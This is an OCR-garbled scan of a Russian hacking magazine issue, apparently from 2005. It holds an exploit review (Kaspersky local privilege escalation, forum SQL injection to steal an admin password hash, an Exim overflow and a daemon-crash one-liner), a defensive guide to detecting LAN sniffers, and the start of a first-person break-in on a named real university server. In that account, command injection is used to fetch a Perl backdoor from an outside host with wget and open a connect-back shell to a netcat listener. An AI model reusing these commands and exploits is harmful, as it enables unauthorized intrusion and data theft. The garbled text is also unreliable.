сервисам, включая ЗЗЦ ЗЗН, ІСО и другие 
(ІіДр://1[іс.огд/сІоѵѵпІоасІ.рІір?Ьг&ЫіусІга-4.6-згс.іаг.д2). 

Ц} ТНС-ѴІоддег (ѵ2.2) — ядерный модуль, который 
незаметно подключается к кернелу и локально снифает 
команды всех пользователей. Этот І_КМ также создает 
удобочитаемый лог с настраиваемой детализацией 
\Шр://\Ъс.огд/до\л/пІоад.рЬр?{=г&Х=ѵІоддег-2. 1 . 1 Хаг.дт ) . 

® ТНС-ЗесигеОеІеІе (ѵЗ.1) — программа для 
параноиков. Как понятно из названия, служит для 
безопасного удаления файлов. Она перезаписывает 
область на диске от 15 до 30 раз, не давая шансов 
восстановить секретную или провокационную 
информацию 

(Іііір:/ЛИс.огд/сІоѵѵпІоасІ.рІір?Ьг&І=5есиге_сІеІе^е-3.1.1аг.д2). 
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[большая честно украденная база зГіасІоѵѵ] 




Докучаев Дмитрий ака РогЬ (РогЬ@геаІ. хакер. ги) 

ОБЗОР ЭКСПЛОЙТОВ 



АЫІѴІВІІЗ КАЗРЕПЗКѴ ЮСАЬ ЕХРЮІТ 
[описание] Не так давно была найдена 
грубейшая уязвимость в отечественном ан- 
тивирусе от Касперского. Суть ее в том, что 
касперская подсистема защиты напря- 
мую вызывает функцию из драйвера кіі^.зуз. 
Все было бы замечательно, если бы не 
один нюанс: со страницы драйвера сни- 
мается бит супервизора, что делает ее об- 
щедоступной для низкоуровневых прило- 
жений. Таким образом, никто не мешает 
перезаписать код этого драйвера специ- 
альной программой, а затем дождаться 
вызова функции. Разумеется, что вызванная 
процедура может содержать вредонос- 
ный код. Скажем, запуск привилегирован- 
ного блокнота, что продемонстрировано в 
тестовом эксплойте :). 

Скажу по секрету, что баг актуален только 
для ѴѴіпсіоѵуз 2000. В ѴѴіпсіоѵуз ХР Касперс- 
кий работает нормально. Видимо, это свя- 
зано с улучшенной реализацией защиты 
операционной системы. 

[защита] Защититься от данной напасти по- 
ка нельзя. Так что, если не хочешь быть не- 
вольной жертвой локального взломщика, 
удали антивирус со своей машины, либо 
установи защиту от другого производителя. 

[ссылки] Тестовый эксплойт ты можешь ска- 
чать по адресу ѵѵѵѵѵѵ. хакер. ги/розі/27002/ 
ехрІоіТ.ТхТ. Как я уже сказал, он запускает 
ноутпад под системным аккаунтом. Этот 
сплойт был протестирован под \Л/іп2к с пя- 
той версией Каспера. 



[злоключение] Как видим, Евгений Касперс- 
кий допустил грубейшую ошибку в своем 
продукте. В результате это подорвало дове- 
рие пользователей к его продукту и пода- 
рило локальным взломщикам еще одну 
прекрасную лазейку в систему. Ведь изме- 
нить часть шеллкода для запуска другого 
приложения очень просто. 

[дгѳеіз] На этот раз о баге нам поведал 
наш соотечественник Илья Рабинович. Он 
описал суть ошибки, а также выложил тес- 
товый эксплойт с примитивным шеллкодом. 




[шеллкод, открывающий блокнот под системным 
пользователем] 



ІІМѴІЗІОІМ РОѴѴЕВ ВОАРЮ 2.0.3 
НЕМОТЕ ЕХРЮІТ 

[описание] В последнее время атаки на 
форумы стали очень популярны. Сперва ха- 
керы рьяно ломали рОрВВ, затем пытались 
искать баги в движке ѵВиІІеііп, а теперь взя- 
лись за популярную борду ІВВ. В скриптах 
этого форума нашлась брешь, позволяю- 
щая выполнить ЗОІ_-инжекцию и утащить па- 
роль администратора. 

Эксплойт работает по принципу брутфор- 
са. Он инициализирует соединение с сер- 
вером, передавая скрипту поддельную ку- 
кизу администратора. Затем с помощью 
ЗОІ_-инжекции сценарий последовательно 
подбирает каждый символ ІѴЮ5-пароля 
пользователя. В конце-концов пользовате- 
лю выводится полный хэш. Его можно вста- 
вить в собственный кукиз, тем самым выдать 
себя за администратора и попасть в ад- 
минку. Либо пойти иным путем — расшиф- 
ровать пароль с помощью ІѴЮбІпзісІе и ис- 
пользовать в других корыстных целях. 

[защита] Чтобы защититься от уязвимости 
необходимо обновить версию форума до 
2.0.4, либо вообще отказаться от этой 
борды. Надо сказать, что во второй вер- 
сии используется вложенная авториза- 
ция, когда найденный ІѴЮ5-хэш является 
очередным ІѴЮ5-хэшем пользовательско- 
го пароля. В этом случае расшифровать 
пассворд почти невозможно. 

[ссылки] Скачать перловый эксплойт можно 
отсюда : и/и/и /.хакер. ги/ро5І/26943/ехрІоіі1 . М. 
Существует так же подобный вариант сплойта 
на РНР, забрать его можно на и/и лл/.хакер.ги/ 
розі/26943/ехрІоіі. ТхТ. 

[злоключение] Для эффективного примене- 
ния эксплойта его необходимо слегка про- 
патчить. В противном случае он будет выда- 
вать звездочки вместо реально найденного 
ІѴЮ5-хэша. Тыкать носом в «неправильную» 
строку не буду — додумаешься сам :). 

[дгееТз] Сценарий для взлома был написан 
кодером 1 сЦ-.\л/01Т из команды РЗТ (Іііір:// 
гзі.ѵоісі.ги). Эта команда написала множе- 
ство рабочих эксплойтов и данный экземп- 
ляр тому доказательство :). 




[наглядная демонстрация взлома] 



ЕХІМ <=4.43 ВІІРРЕВ ОѴЕВРЮѴѴ ЕХРЮІТ 
[описание] Не так давно я описывал уязви- 
мость в Ехіт, основанную на баге в ЗРА-ау- 
тентификации. На этот раз брешь кроется 
уже в другой функции под названием 
бп5_ЬиІсІ_геѵег5е(). При умелом подходе 
можно передать в эту процедуру мусор, 
который переполнит буфер. Эти данные 
затем будут переданы в специальный бу- 
фер, а через некоторое время исполнятся 
в виде команды. 

Единственный недостаток эксплойта кро- 
ется в том, что рута он не дает. Дело в том, 
что при выполнении кода, ехіт делает зеіи- 
ісІ() на пользователя таіі, под которым, 
собственно, и запускается командный ин- 
терпретатор. 

Впрочем, убить ехіт можно и без эксплойтов. 
Достаточно выполнить команду /изг/Ьіп/ехіт 
-Ып ::%А'регІ -е 'ргіпі раскС'ІЛОхсіеасІЬееО х 
256", и почтовый демон быстро склеит лас- 
ты. Попробуй — тебе понравится :). 

[защита] Защититься от напасти можно двумя 
способами. Либо установить патч, который 
выложен на странице ѵѵѵѵѵѵ. ехіт. огд/таИ- 
агс!ііѵе2/ехіт-аппоипсе/2005/тзд00000.ІіітІ, 
либо скачать свежий релиз ехіт'а с этого 
же сайта. 

[ссылки] Ознакомиться с возможностями 
локального эксплойта можно по адресу 
ѵѵѵѵѵѵ.хакер.ги/розТ/27010/ехрІоіТ. іхі. Дета- 
ли уязвимости доступны на этой странице: 
Іііір://зесигііу. ппоѵ. ги/с!осз7598.ІіітІ. 



[злоключение] Не думаю, что этот эксплойт 
наделает много шума. Да, баг является ра- 
бочим и может повлечь за собой утечку 
всей почтовой корреспонденции (ведь иісі 
ехіт'а позволяет получить доступ к пользо- 
вательской почте). Однако мало кому ну- 
жен локальный шелл с правами таіі — раз- 
ве только хакерам, охотящимся именно за 
конфиденциальными письмами :). 



[дгееТз] Идея и воплощение уязвимости пол- 
ностью принадлежит известной команде 
ЮЕЕЕІМЗЕ. О популярности данной команды 
я молчу — творения этих ребят я описываю 
практически в каждом обзоре эксплойтов. 




[простой код сложного эксплойта] 







ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20ЫЕ РЕНРШМ НЬЮСЫ 



Удар по сниферу 



ЕСЛИ ТЫ РАБОТАЕШЬ В ЛОКАЛЬНОЙ СЕТИ, 
ТЕБЕ СТОИТ ОПАСАТЬСЯ ЗА СОХРАН- 
НОСТЬ ПЕРЕДАВАЕМЫХ ТОБОЙ ДАННЫХ. 

В ЛЮБОМ СЕГМЕНТЕ ВСЕГДА НАЙДЕТСЯ 
ХАКЕР, КОТОРЫЙ НЕ ПРОЧЬ «ПОРЫБА- 
ЧИТЬ» В ЛОКАЛКЕ НА ПРЕДМЕТ ПРОЛЕТА- 
ЮЩИХ ПАРОЛЕЙ, ЛИЧНОЙ ПЕРЕПИСКИ И 
ПРОСТО ДАННЫХ, КОТОРЫЕ НЕ ПРИНЯТО 
СООБЩАТЬ ПЕРВОМУ ВСТРЕЧНОМУ. ЧТОБЫ 
НЕ ПОПАСТЬ ВПРОСАК, ТЫ ПРОСТО ОБЯЗАН 
ЗНАТЬ ОСНОВНЫЕ МЕТОДЫ ОБНАРУЖЕНИЯ 

СНИФЕРОВ I Докучаев Дмитрий ака РогЬ (1ЪгЬ@геаІ. хакер. ш) 



Обнаружение нюхачей 
в локальных сетях 

[теоретические основы] Ни для кого не сек- 
рет, что в любой локальной сети можно пе- 
рехватывать информацию. Прослушивание 
сети на хабах осуществляется очень легко: 
снифер принудительно переводит Іап- 
адаптер в рготізс тобе, в результате чего 
карточка начинает принимать абсолютно 
все пакеты, даже ей не предназначенные. 
Такой метод получил название «пассивный 
перехват» и может быть реализован только 
в случае использования хабов. 

Если провайдер заботится о своих клиен- 
тах, то он обязательно заменит все хабы 
на свитчи. При этом коммутатор никогда 
не будет пересылать трафик по всем пор- 
там, а гарантированно отправит их только 
в гнездо получателя. Однако существует 
реализация атаки МііМ, при которой АРР- 
таблицы целевых узлов заполняются лож- 
ными данными, в результате чего трафик 
между двумя машинами пересылается че- 
рез третий компьютер. Такой вид перехва- 
та называется активным. Несмотря на ка- 
жущуюся безысходность, существуют ме- 
тоды, позволяющие засечь работу как ак- 
тивного, так и пассивного снифера. Все 
они базируются на основах передачи 
данных в сети ЕіНегпеі, посему являются 
простыми и понятными. 

[в сети пассивный снифер] Предположим, 
что у нас имеется локальная сеть 192. 168.0.0 
/255.255.255.0. За каким-то ІР-адресом 
располагается хакер, запустивший пас- 
сивный снифер. Наша задача — найти ай- 
пишник злоумышленника, чтобы впослед- 
ствии настучать ему по голове тяжелым 
предметом :). Эта проблема решается 
несколькими способами, но, к сожале- 
нию, некоторые из них по ряду причин мо- 
гут не сработать. 




На компакт-диске ты най- 
дешь все описываемые ути- 
литы для сетевого проти- 
востояния, а также упомя- 
нутую статью с ѵоіб.ги. 




Обязательно прочитай об- 
зор программы АпііВпіб на 
ѵоіб.ги. В статье описаны 
все методы, используемые 
программой для выявления 
сниферов: шшш.ѵоіб.ги/соп- 
іепі/652. 



И Доблестный ріпд на страже порядка. Начнем с самого просто- 
го способа определения снифера. Как ты знаешь, преобразова- 
ние М АС-адреса в ІР осуществляется с помощью протокола АРР. 
При нормальном режиме работы сетевой карты адаптер будет 
проверять МАС-адрес в каждом фрейме на соответствие со сво- 
им. Если МАО совпал — пакет будет принят, иначе — отброшен. 
Но при переводе сетевухи в рготізс тобе МАС-адрес не будет 
проверяться — абсолютно все пакеты пройдут через компьютер 
злоумышленника. Предположим, что за адресом 192.168.0.5 скры- 
вается снифер и тебе необходимо убедиться в этом. Твои даль- 
нейшие действия заключаются в выполнении двух команд: 



агр -з 192.168.0.5 11-22-33-44-55-66 
ріпд 192.168.0.5 



Если ты получишь ответ от узла, то снифер действительно присутствует. По- 
лучив пакет с некорректным маком, система увидит в нем ЕСНО_РЕОІІЕЗТ 
и ответит на него пакетом ЕСНО_РЕРІ_У, выдав себя с потрохами. 

Этот прием с блеском работает на большинстве Ппих-систем и 
некоторых \Л/іпсІо\л/5. Однако в последнее время стало модным 
снабжать снифер виртуальным фильтром МАС-адресов. На неко- 
торых перехватчиках проверка 
ведется лишь по первому байту 
мака, таким образом, стати- 
ческое представление МАС- 
адреса в виде ЕЕ-00-00-00-00-00 
может привести к положитель- 
ному результату (система 
увидит в МАО широковещатель- 
[обнаружение снифера методом пинга] ный адрес и ответит на него). 




I * 





й 



Ш Провокация с помощью АРР. Второй метод поиска нюхачей 
заключается в посылке АРР-запроса на обычный, не широкове- 
щательный адрес. Когда система хочет узнать ІР-адрес машины, 
она посылает на ЬгоасІсазТ-ір запрос \л/Гю Паз, который направ- 
лен на выявление МАС по известному ІР. Исходя из факта, что ма- 
шина с запущенным снифером примет все пакеты, можно послать 
АРР-запрос на конкретный ІР-адрес. После того как пришел АРР- 
ответ, необходимо посмотреть айпишник отправителя. В случае, 
когда он не соответствует адресу, на который был послан зап- 
рос, можно судить, что на машине запущен снифер. 

Рассмотрим этот прием на конкретном примере. Допустим, ты на- 
ходишься за компьютером А с ІР-адресом 192.168.0.5 и шлешь 
АРР-запрос на ІР-адрес 192.168.0.6. После этого тебе возвраща- 
ется ответ с М АС-адресом, но уже от 192.168.0.13. Это означает, 
что за последним хостом скрывается злоумышленник, вооружен- 
ный пассивным снифером :). 

0 ЭІ\ІЗ — твой друг, товарищ и брат. При приеме данных снифер 
сразу же пытается резолвнуть ІР-адрес в удобочитаемый Гю$Т- 
пате. Именно за эту зацепку можно ухватиться и таким образом 
выявить перехватчик. Если ты являешься администратором сети, то 
твои действия упрощаются. Необходимо лишь выполнить команду 
іаіі -і /ѵаг/Іод/патесІ/диегіез.Іод и пингануть машинку, которой в 
данный момент нет в сети. В этот момент снифер умеючи перехва- 
тит ІСМР-пакет и попытается резолвнуть адрес отправителя и по- 
лучателя. В логе ЭІ\І5-запросов сразу же появятся сведения об 
этом, и ты быстро уличишь хакера. 

Сложнее, если ты обычный пользователь локалки. Но даже в та- 
ком случае можно воспользоваться этим приемом. Тебе нужно 
лишь отплатить врагу той же монетой. Запусти любой снифер, ус- 
танови в нем фильтр на ЭІ\І$-запросы и пингуй какой-нибудь узел. 
Если в логе перехватчика появятся сведения об обращении к ЭІ\І5- 
серверу, пришедшие с левого ІР-адреса, знай: в сегменте завел- 
ся хакер. Кстати, этот метод является универсальным и работает 
даже в том случае, если злоумышленник пользуется сторонним 
ЭІ\І$-сервером без логирования запросов. 

Однако может случиться так, что взломщик намеренно отключит 
трансляцию ІР-адресов в символьные значения. В этом случае 
можно прибегнуть к более изощренным способам отлова. 

И Ловушка. В наше время становятся модными сниферы, которые 
отображают только важную информацию. Сейчас уже мало кто 
будет пользоваться простыми анализаторами сети типа ісрбитр. 
Хакер лучше скачает умную программу 2Х$пі1Тег, умеющую отлав- 
ливать пароли к различным сервисам. На таких взломщиков мы и 
будем искать управу. 



Самый простой способ этого метода заключается в следующем: 
допустим, у тебя есть свой ЕТР-сервер, на котором ты хранишь 
различные фильмы и музыку. Твоя задача — заинтересовать хаке- 
ра, чтобы он зашел на твой ЕТР'шник. Причем не под обычным ло- 
гином, а под привилегированным. Для этого создай пользователя 
гооі со сложным паролем. Затем зайди с тачки, не принадлежа- 
щей твоей локалке, на собственный ЕТР. Ловушка готова! Теперь, 
если хакер отловил «привилегированный» аккаунт, он обязатель- 
но зайдет посмотреть на твой архив. Аты по логам определишь ІР, 
за которым скрывается злоумышленник. 

Данный прием чем-то напоминает социальную инженерию, так 
как ты заранее подстраиваешь исход ситуации. Этот метод 
действительно универсален и подходит для всех сниферов и ти- 



[СОФТ ДЛЯ ОБНАРУЖЕНИЯ СНИФЕРОВ] 

Ш Самая хитовая программа, применяемая в системе 
ѴѴіпІМТ, называется АпЛЗпіТТ (ѵѵѵѵѵѵ. ЮрЫ.сот/апіізпііГ). 
Она юзает большинство способов детектирования сни- 
феров на хабах и в деталях отчитывается о сканиро- 
вании сети. Программа имеет интуитивно понятный 
интерфейс и не нуждается в инсталляции, 
й На втором месте идет софтина с названием 
РготісЗсап (ѵѵѵѵѵѵ. зесигііуІаЬ. ги/іооіз/сіо ѵѵпіоа 6/ 

25281 .МтІ). С ее помощью можно выявлять адаптеры, 
находящиеся в смешанном режиме. Однако програм- 
ма платная, и в триале удастся лишь просканировать 
сеть 192.168.0.0/24. 

® Для *піх-систем применяется утилита пересі 
(ѵѵѵѵѵѵ. арозіоіз.огд/ргоіесіі/пересі/), которая тестирует на- 
личие сниферов с помощью мониторинга ОЫЗ-запро- 
сов. Программа зарекомендовала себя как весьма эф- 
фективное средство по борьбе со злоумышленниками. 
Й Похожая софтина называется зепііпеі (ѵѵѵѵѵѵ. раскеі- 
Іасіогу.пеі/Ргоіесіз/зепііпеІ). В программу внесено нес- 
колько методов, ориентированных на обнаружение па- 
кетных сниферов. 

[Ц И наконец, обязательно заюзай описанный в статье 
ядерный модуль агр_ап!ісІо1 (ѵѵѵѵѵѵ. зесигііуІаЬ. ги/_іооІз/апіі- 
боіе2Ш.дг) и программу АгрѴѴаІсИ (ѵѵѵѵѵѵ. зесигііуіос- 
из.сот/сіаіа/іооІз/агрѵѵаісЬ.іаг.2) . Напомню, что эти сред- 
ства применяются для обнаружения пассивных снифе- 
ров, базирующихся на атаке типа МіІМ. 



[хакер 07 [79] 05 > ВЗЛОМ 047 ] 



[ХАКЕР 07 [79] 05 > ВЗЛОМ 048 ] 




№ 



(расставляем ловушки для хакеров) 

пов операционных систем. Если ты озабочен вопросом, что твои 
данные кем-то перехватываются, обязательно подстрахуй себя 
этой проверкой. 

0 Тест сетевой латентности. Предложу еще один способ опреде- 
ления пассивных сниферов. Он заключается в посылке мусора в 
сеть. Причем сгенерированные пакеты должны иметь левые МАС- 
адреса. Параллельно с этим осуществляется пинг всех машин в се- 
ти и сравнение результатов. По определению снифер будет кушать 
все пакеты и тем самым загружать собственный канал. Параллель- 
ный опрос времени ответа укажет на виновника. Впрочем, данный 
прием целесообразен, когда ты точно знаешь топологию твоей ло- 
калки. Бывает, что провайдер сам зарезает канал до определенных 
узлов. В этом случае прием не имеет особой эффективности. 

0 Локальное выявление сниферов. Если у тебя есть подозрение, 
что хакер установил перехватчик данных на маршрутизаторе, ли- 
бо одним из вышеперечисленных приемов ты доказал этот факт, 
то следует найти и нейтрализовать снифер. Самый простой спо- 
соб отыскать нюхача — выполнить команду ИюопИд е1Тіег_паппе. 
Если в выводе результата будет присутствовать слово РРОМІ8С, 
это означает, что адаптер находится в прослушивающем режиме 
и, следовательно, в системе есть снифер. Однако даже если ат- 
рибута РРОМІЗС не будет, взломщик мог установить руткит и прот- 
роянить бинарник /зЬіп/ИюопИд. На всякий случай возьми прове- 
ренный исполняемый файл и запусти его на маршрутнике. 

[активная атака — скрытая атака] Даже если ты уверен, что твоя 
сеть строится на одних коммутаторах, это не означает, что пере- 
даваемые данные на 100% защищены. Используя метод отравле- 
ния АРР-таблиц (АРР-роізопіпд), хакер может заставить шлюз пе- 
ресылать информацию через свой компьютер. Описание этой 
атаки я уже приводил в прошлом номере (статья «Операция «Вул- 
кан-5»), поэтому повторяться не буду. 

Методы защиты от такого перехвата могут быть применены лишь 
администраторами сети. К сожалению, пользователь от таких 
атак защититься не может. Но, как говорится, безысходных ситуа- 
ций не существует, поэтому читай во врезке готовые решения, 
применяемые против всех нюхачей. А пока рассмотрим сред- 
ства противостояния против атаки типа МііМ. 

И АРРѴѴаІюГі — простенько и со вкусом. АРРѴѴаТсР (и/и /ѵѵ.зесигіТу- 
Тосиз. сот/сІаТа/ТооІз/сігрѵѵаТсІі. іаг.2) — это очень хорошая тулза. 
Она занимается выявлением нелегально присвоенных МАС-ад- 
ресов, отлавливая все АРР-ответы и складывая их в базу. Если ка- 
кой-то узел отправил пакет с МАС-адресом, уже имеющимся в 
базе, программа сравнивает его с записанным и в случае несо- 
ответствия отправляет е-таіі-уведомление администратору. 
Таким образом, все активные нюхачи будут обнаружены адми- 
ном. Но здесь следует оговориться: в случае, если в сети ис- 
пользуется ОНСР-протокол, программа АРРѴѴаІюГі не может 
быть использована, поскольку один и тот же МАС-адрес впол- 
не может быть закреплен за разными ІР-адресами. 

0 АРР_АпіЮоі кегпеі раісБ. 
Ядерная заплатка с интересным 
именем агр_апіісІоі ( Шр://зеси - 
гііуІоЬ.ги/_іооІз/опіісІоіе2. сШІ ді) 
изменяет реализацию протоко- 
ла АРР в І_іпих и полностью нейт- 
рализует атаку АРР-роізопіпд. 
Когда в систему приходит АРР- 
(играем с агрмаісі'т) запрос с требованием изменить 



МАО, запускается специаль- 
ная процедура верификации: 
всем машинам посылается до- 
полнительный широковеща- 
тельный пакет, ответом на кото- 
рый будут ІР- и М АС-адреса. 

Если какой-то узел пришлет тот 
же МАС, что и в поддельном 
запросе, атака будет распоз- 
нана. С помощью значений 
зузсН можно настроить реакцию заплатки на атаку. Возможны три 
варианта: просто сообщить администратору, сообщить и пропи- 
сать ІР-адрес как статический либо сообщить и заблокировать ІР- 
адрес. 

Если смена МАС-адреса связана не с атакой, а со стандартной ситу- 
ацией, ядро обновит запись после небольшого промежутка времени. 
Установить патч очень просто. Сперва скачиваем его, затем распа- 
ковываем и применяем (раТсР -рі < апІібоіе.сВД. После этого необ- 
ходимо перекомпилировать ядро и настроить заплатку. Вот опции 
ядра, которые добавляются в зузсН -а после применения патча: 

пеЕірѵ4.пеідІі.сІе^аиІЕагр_апТісІоТе=режим, где «режим» — одна из 

вышеперечисленных реакций. 

К сожалению, этот патч был написан только для ядра 2.4 и, как след- 
ствие, применим лишь на Шпих-серверах. Но автор патча, небезыз- 
вестный Ьиддіу, не останавливается на достигнутом и будет про- 
должать развивать свой проект и для других операционных систем. 

[сниферы выявлены, взломщики наказаны] Я думаю, что после 
практического применения этих приемов в твоей сети поубавится 
«рыбаков». Сам понимаешь, тестировать сеть вручную — боль- 
шой гемор, поэтому специально для тебя умельцы написали гра- 
мотный софт, распознающий сниферы в локальной сети. За под- 
робностями обращайся ко врезке. 

А мне лишь остается проститься с тобой и пожелать удачи в ус- 
пешном обнаружении сниферов. И не дотягивай до последнего, 
когда о твоих паролях будет знать весь интернет! © 



[СПОСОБЫ ЗАЩИТЫ ОТ «РЫБАКОВ»] 

Существует ряд приемов, которые стопроцентно помо- 
гут тебе защититься от сниферов. С радостью пове- 
даю тебе о них. 

Й [ѴРІЧ] Достаточно универсальное средство, которое 
поможет тебе не только изменить ІР-адрес, но и за- 
шифровать данные. При этом никакой снифер не смо- 
жет их расшифровать. Чтобы воспользоваться ѴРЫ- 
доступом, можно приобрести его за сравнительно не- 
большую плату либо поставить софт на доверенном 
*піх-сервере за пределами локальной сети. 

0 [зіиппеі] Защищенное туннелирование трафика — 
способ защиты, похожий на ѴРІМ, однако с его по- 
мощью можно зашифровать данные только по одному 
протоколу. Для реализации этого метода достаточно 
поставить программу зіиппеі на удаленной машинке и 
на своей. Затем потребуется настроить сервер и кли- 
ент с последующим их соединением (за подробностя- 
ми обращайся к статье «Выбери свой туннель», 
Х/03.2002). Таким образом можно защитить себя от 
перехвата трафика в ІСО или ІВС. 

0 Использование защищенных соединений 
Если у тебя нет денег на сервисы, как и доверенных 
серверов :), ты можешь охранять свои данные абсо- 
лютно бесплатно. Для этого потребуется лишь пере- 
настроить все сетевые клиенты на защищенные 
протоколы, благо большинство сервисов это позво- 
ляет. Например, никто не мешает тебе снимать поч- 
ту через ІМАР-ВЗБ и слать ее через ЗМТР-ЗЗІ_. Так- 
же можно юзать защищенное соединение в ІВС-се- 
тях либо в ѴѴеЬ-браузере. 

Как ты понял, вся сила в шифровании. Только зашиф- 
рованный трафик можно спокойно отпускать в путеше- 
ствие по открытым сетевым каналам. Даже если за то- 
бой будет наблюдать хакер, он не утащит у тебя ни 
байта ценной информации. 





(зри в РРОМІ8С!) 





ѵѵѵѵѵѵ. т рю.со т . г и 







ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20ЫЕ РЕВВІІМ НЬЮСЫ 









УЖЕ МНОГО ЛЕТ БЫТУЕТ МНЕНИЕ, ЧТО АДМИНИ- 
СТРАТОРЫ УЧЕБНЫХ ЗАВЕДЕНИЙ, НА ЧЬЕМ ПО- 
ПЕЧЕНИИ НАХОДЯТСЯ ОСНОВНАЯ МАССА МА- 
ШИН, РАЗДОЛБАИ КАКИХ СВЕТ НЕ ВИДЫВАЛ И, 
МЯГКО ГОВОРЯ, ОНИІНЕКОМПЕТЕНТНЫ В СВОЕЙ 
ОБЛАСТИ. ПОСКОЛЬКУ СЦЕНАРИИ ДЛЯ ВУЗОВС- 
КИХ ВЕБ-УЗЛОВ ПИШУТ ПРОВИНИВШИЕСЯ СТУ- 
ДЕНТЫ НА ПРАКТИКЕ, ЭТИ ПРОГРАММЫ ВЕСЬМА 
КОРЯВЫЕ И В НИХ ПОЛНО ОШИБОК. В ОДИН ИЗ 
ДОЖДЛИВЫХ ВЕСЕННИХ ДНЕЙ,' КОГДА ИЗ-ЗА ТЯ- 
ЖЕЛОГО СВИНЦОВОГО НЕБА И ОБИЛИЯ ЦВЕТАС- 




ОВ НА УЛИЦЕ КАЗАЛОСЬ, ЧТО НА ДВО- 
НА ОКТЯБРЯ, И ВЫХОДИТЬ НА УЛИЦУ 
НО НЕ ХОТЕЛОСЬ, Я РЕШИЛ ПРОВЕ- 
НЕННОСТЬ ЭТОГО МИФА. И ПОЛУчИ- 

БАВНО I Александр Любимов ака ЗазЬікз (геаІ_ззЬх(<$таіІ.ги) 
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Все действия, описанные в 
этой статье — вымысел. В 
данном материале был 
представлен сценарий гото- 
вящегося к выпуску голли- 
вудского боевика. Все пер- 
сонажи и события вымыш- 
лены. Любые совпадения — 
случайность :). 




Скачиваем 6 же со следу- 
ющих сайтов: 
ШрУАідегіеаш.зе/бІ/д шее 
и/и/и/, сусот.зе/бі/д те 
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Скрипт из статьи тяни от- 
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Шр://ыпіхіогде.6гд/~ззІіх/х 
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На нашем диске ты най- 
дешь гФіные версии прог- 
раіѵПЙърписанншх в этой 
статье. 
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Университетский хак 



Как (Зѵѵее помог взломать 
университетский сервер 

[Рюск ТІте Ііпіѵѳгзііу] На помощь как всегда, 
пришел верный Гугл. Я ввел в строку поиска 
что-то вроде зііе:есІи.иа и через некоторое 
время, потраченное на интеллектуальное 
тыканье по ссылкам, я попал на сайт крупно- 
го донецкого ВУЗа — ДоНТУ ( сіоппіи.есіи.ио ). 
Что же, неплохо для начала. Впечатлял спи- 
сок сайтов кафедр. Разумеется, на одном из 
них я ожидал встретить бажный скрипт, кото- 
рый ждал бы меня, чтобы выдать веб-шелл 
или позволить слить важную БД. Осталось 
только найти этот сценарий. 

Я бегло начал просматривать довольно 
убогие (в плане оформления) страницы. 
Но, к сожалению, большинство страниц 
были построены на статичном ГіітІ. Искать 
там было, соответственно, нечего. Но 
вдруг, совершенно неожиданно, мне улыб- 
нулась госпожа Удача! Тыкая по ссылкам, 
я попал на «Факультет компьютерных ин- 
формационных технологий и автоматики» 
фіір://Шо. сіоппіи. есіи. иа/сді-Ып/іпсІех.рІ ) 
и нашел там то, что искал. С индекса меня 
сразу же перебросило на веселую стра- 
ницу іііір://ікііо. сіоппіи. есіи. ио/сді-Ып/іп- 
с!ех.рІ?пе\л/5іог=ісііа8(раде=сопіепііп- 
сІех&5ію\л/=ігие. 



Судя по дате последнего поста, сайт давно не обновляли и, следо- 
вательно, за ним никто не следил. Я решил попробовать подставить 
в параметр раде заветную строчку « I ісі I » и, сразу после того как 
страница загрузилась, я узнал, что у меня есть доступ к веб-шеллу, 
причем с правами локального юзера арасГіе! Да, ты все верно по- 
нял: этот сді-сценарий имеет в себе столетний баг, из-за которого 
можно выполнить любую команду, указав ее вместо имени откры- 
ваемого файла. Теперь осталось лишь найти, чем бы залить бэк- 
дор на машину. Мне было необходимо узнать, какие утилиты для 
закачки установлены в системе и лишь потом производить иріоасі. 
Я выполнил команду I \л/ГіісГі \л/деі;\л/ГіісГі Іупх I и узнал, что на маши- 
не стоит \л/деі. Отлично! То, что нужно! Командуем I \л/деі 
іііір://5еѵег.огд/~55Ііх/х/ЬсІ.рІ -О /ітр/ЬсІ.рІ;регІ /Ітр/Ьсі.рі I . По мо- 
ей идее, после выполнения этого запроса должен был закачаться 
бэкдор и открыться 37900 порт для прослушивания входящих сое- 
динений. Я попробовал подключиться на нужный порт, но из этой 
затеи ничего не вышло, так как порт был закрыт. Видимо, эту маши- 
ну защищает межсетевой экран, и он не позволил мне прицепить- 
ся к бэкдору. Я запустил на своем удаленном шелле птар, чтобы 
посмотреть, какие порты открыты наружу: 

$ птар -зѴ -Р Ііир://Ма.сІоппШ.есІи.иа 

21 Лер ореп Йр РгоРТРО 1.2.1 Огсі 

22Лср ореп ззГі ОрепЗЗН 3.6.1 р2 (ргоіосоі 1 .99) 

80Лср ореп ІШр АрасИе ИИрс1 1 .3.33 ((АН Ыпих/аІН) гиз/РІ_30.20) 

Да, действительно, все пакеты, идущие на компьютер, кроме ад- 
ресованных службам \л/еЬ, Ир и ззГі, зарезались. Баннеры серви- 
сов указывали на то, что софт своевременно и добросовестно 
обновляли. Ну, ничего, против лома нет приема (как оказалось 
потом, против моего лома прием все же нашелся :)). Можно поп- 







робовать старый добрый сЬсІ.рІ (сопп-Ьаск бэкдор на РегІ анало- 
гичен ему же на С, но более удобен, так как регі-интерпретатор 
присутствует практически на 90% машин). 

Отдав команду \л/деТШр://зіТе. огд/~ззІіх/х/сЬсІ.рІ -О /Ттр/сЬсІ.рІ;регІ 
/ітр/сЬсІ.рІ мой_ір 5000, я запустил у себя на машине неткат и ждал 
подключений: 

$ пс -ѵѵ -I -р5000 

Но, к моему величайшему удивлению, ничего не произошло. Мо- 
жет, проблема с гадским бэкдором? Я решил залить его еще раз, 
только с флагом -о /Ттр/гез.ТхТ, чтобы более подробно изучить про- 
цесс загрузки. Возможно, изъян заключался именно в процессе 
заливки файла. Я просмотрел отчет о сІо\л/пІоасГе, и меня постигло 
разочарование: в последней строчке гез.М я увидел следующее: 

Соппесііпд іо зііе.огд [62.121 .133.131]:80... іаііесі: Соппесііоп геіизесі. 

Это был жестокий облом. Как выяснилось позже, я не мог скачи- 
вать из инета никаких файлов, и это заставило призадуматься о 
дальнейших действиях на вражеской стороне. 

Возможно, читая эту статью, ты подумал, что «вот опять стандартный 
взлом через веб, о которых в журнале уже сто раз писали. Неужели 
нет чего-то поинтересней?». Это не так :). Вот скажи мне, что делать 
в этой ситуации, как быть? Есть веб-дырка, через которую с горем 

пополам можно вы- 
полнять команды. Ни- 
какой внешний файл 
загрузить напрямую 
невозможно. Ты зна- 
ешь, что делать даль- 
ше? Если знаешь, 
смело пролистывай 
страницу. А мы пока 
